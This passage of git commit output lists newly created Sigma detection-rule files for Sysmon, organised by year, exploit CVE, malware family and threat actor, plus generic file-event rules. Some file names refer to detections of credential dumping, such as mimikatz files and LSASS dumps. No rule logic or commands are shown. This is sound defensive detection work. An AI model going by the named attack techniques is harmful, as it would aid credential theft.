tools/sigmac/converted_rules/sysmon/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Exploits/CVE-2019-1378/proc_creation_win_exploit_cve_2019_1378.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/emerging-threats/2020/Malware/Trickbot/proc_creation_win_malware_trickbot_wermgr.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-1675/file_event_win_cve_2021_1675_printspooler.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-26858/file_event_win_cve_2021_26858_msexchange.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/file_event_win_exploit_cve_2021_40444.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/file_event_win_cve_2021_41379_msi_lpe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-44077/file_event_win_cve_2021_44077_poc_default_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Devil-Bait/file_event_win_malware_devil_bait_script_drop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/FoggyWeb/image_load_malware_foggyweb_nobelium.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/file_event_win_malware_goofy_guineapig_file_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Moriya-Rootkit/file_event_win_moriya_rootkit.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Pingback/file_event_win_malware_pingback_backdoor.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Pingback/image_load_malware_pingback_backdoor.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Small-Sieve/file_event_win_malware_small_sieve_evasion_typo.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/TA/PRIVATELOG/image_load_usp_svchost_clfsw32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/Exploits/CVE-2022-24527/file_event_win_cve_2022_24527_lpe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/Exploits/CVE-2022-26809/proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml create 
mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/Malware/Bumblebee/create_remote_thread_win_malware_bumblebee.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-27363/file_event_win_cve_2023_27363_foxit_rce.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/file_event_win_exploit_cve_2023_34362_moveit_transfer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_report_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_wermgr_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/proc_creation_win_exploit_cve_2023_36874_fake_wermgr.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-36884/file_event_win_exploit_cve_2023_36884_office_windows_html_rce_file_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/file_event_win_exploit_cve_2023_38331_winrar_susp_double_ext.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-40477/file_event_win_exploit_cve_2023_40477_winrar_rev_file_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/proc_creation_win_exploit_other_win_server_undocumented_rce.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_renamed_cmd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_service_dll_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/COLDSTEEL/image_load_malware_coldsteel_persistence_service_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_cleanup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/DarkGate/file_event_win_malware_darkgate_autoit3_binary_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Pikabot/net_connection_win_malware_pikabot_rundll32_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_encrypted_payload_ioc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_installers_ioc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_werfault_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/dns_query_win_malware_socgholish_second_stage_c2.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/dns_query_win_malware_3cx_compromise.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/image_load_malware_3cx_compromise_susp_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/net_connection_win_malware_3cx_compromise_beaconing_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Cozy-Bear/image_load_apt_cozy_bear_graphical_proton_dlls.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Diamond-Sleet/dns_query_win_apt_diamond_steel_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Diamond-Sleet/file_event_win_apt_diamond_sleet_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Diamond-Sleet/image_load_apt_diamond_sleet_side_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/FIN7/file_event_win_apt_fin7_powershell_scripts_naming_convention.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Lace-Tempest/file_event_win_apt_lace_tempest_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Lazarus/image_load_apt_lazarus_side_load_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Onyx-Sleet/file_event_win_apt_onyx_sleet_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_change/file_change_win_2022_timestomping.yml 
create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_cve_2021_1675_print_nightmare.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_delete_backup_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_delete_event_log_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_delete_exchange_powershell_logs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_delete_iis_access_logs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_delete_powershell_command_history.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_delete_prefetch.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_delete_teamviewer_logs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_delete_tomcat_logs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_access_susp_teams.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_access_susp_unattend_xml.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_advanced_ip_scanner.yml 
create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_anydesk_artefact.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_aspnet_temp_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_bloodhound_collection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_crackmapexec_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_create_evtx_non_common_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_create_non_existent_dlls.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_creation_new_shim_database.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_creation_scr_binary_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_creation_system_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_creation_unquoted_service_path.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_cscript_wscript_dropper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_csexec_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_csharp_compile_artefact.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_dll_sideloading_space_path.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_dump_file_susp_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_errorhandler_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_exchange_webshell_drop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_gotoopener_artefact.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_hktl_dumpert.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_hktl_inveigh_artefacts.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_hktl_mimikatz_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_hktl_nppspy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_hktl_powerup_dllhijacking.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_hktl_quarkspw_filedump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_hktl_remote_cred_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_hktl_safetykatz.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_install_teamviewer_desktop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_iso_file_mount.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_iso_file_recent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_lsass_default_dump_file_names.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_lsass_shtinkering.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_lsass_werfault_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_mal_adwind.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_mal_octopus_scanner.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_msdt_susp_directories.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_net_cli_artefact.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_new_scr_file.yml create mode 100644 